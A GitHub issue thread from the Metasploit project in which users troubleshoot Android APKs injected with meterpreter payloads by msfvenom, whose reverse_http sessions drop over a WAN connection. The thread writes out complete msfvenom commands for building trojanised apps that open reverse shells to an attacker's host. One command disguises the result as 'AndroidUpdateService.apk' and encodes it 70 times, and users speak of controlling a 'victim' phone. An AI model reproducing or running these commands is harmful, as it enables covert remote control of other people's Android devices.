### ISSUE TITLE
Inject android payload into an APK isn't working on WAN

### ISSUE THREAD

**Issue by 0xIslamTaha** [rapid7/metasploit-framework#7659]
## Steps to reproduce
- Using the following command to produce the paylaod
`msfvenom -x <any_apk> -p android/meterpreter/reverse_http LHOST=<public_IP> LPORT=8080 -o name.apk
`

The session will be closed after almost 5 sec. I tried all available payloads with different source APK and I faced the same issue, However when I use a **LOCAL IP**, Session will be stable and I interact with the victim android phone. 

## Expected behavior
Infected APK session shouldn't be closed after almost 5 seconds over WAN.

## Current behavior
Infected APK session dead after almost 5 seconds over WAN.

### Metasploit version
metasploit v4.13.4-dev-d08aff2dcc0deea190a2db8c9f5705c89897f160]

### Android Targed:
Android 5.1

### I installed Metasploit with:
- [ ] Omnibus installer (nightly)

### OS
ubuntu 16.04

**Comment by timwr** [comment]
I can't reproduce this. Can you provide more information? e.g:
Does this only occur on reverse_http payloads (as opposed to reverse_tcp)
Does this only occur during injection (with -x)?
Does the payload reconnect (you can also use the `meterpreter> sleep 1` command to test this)?
Please also double check your setting the correct (external) IP in both the handler and the payload.

**Comment by islamTaha12** [comment]
@timwr You have to set an public IP.
- Its occurring for reverse_http and reverse_https but reverse_tcp is working well.
- Ya, Its occurring during injection only
- Payload doesn't reconnect
- I'm sure the configuration is going well.

**Comment by timwr** [comment]
Do you see anything interesting on `adb logcat` when it dies? You're on the latest version right?
The only thing I can think of this is this bug: https://github.com/rapid7/metasploit-framework/pull/7584
Perhaps you can try apply the fix and see if it makes a difference, or try inject into an apk that has not been though proguard (e.g https://github.com/heavysixer/phonegap-camera-sample/blob/master/bin/CameraSample.apk)

**Comment by islamTaha12** [comment]
@timwr I tried it with many several apk, The tricky point is if LHOST=<Local IP>, The injected apk will working fine BUT If the LHOST=<Gloabl IP>, The injection apk will send a session but it will be killed in 1 second.

Bug:#7584 used Local host IP.

**Comment by OrtoNormale** [comment]
Me too had the same problem. 
All works good with LOCAL_IP but not working with PUBLIC_IP.

This is the command I use to create apk payload:

`msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.195 LPORT=4444 -x /home/roma/APK/good/AndroidUpdateService.apk -o /home/roma/APK/infected/AndroidUpdateService.apk --platform android -k -a dalvik -i 70`

Template apk is just a simple starting template from Android Studio compiled without any modify.

Victim Android 5.1 but also with others Android versions.
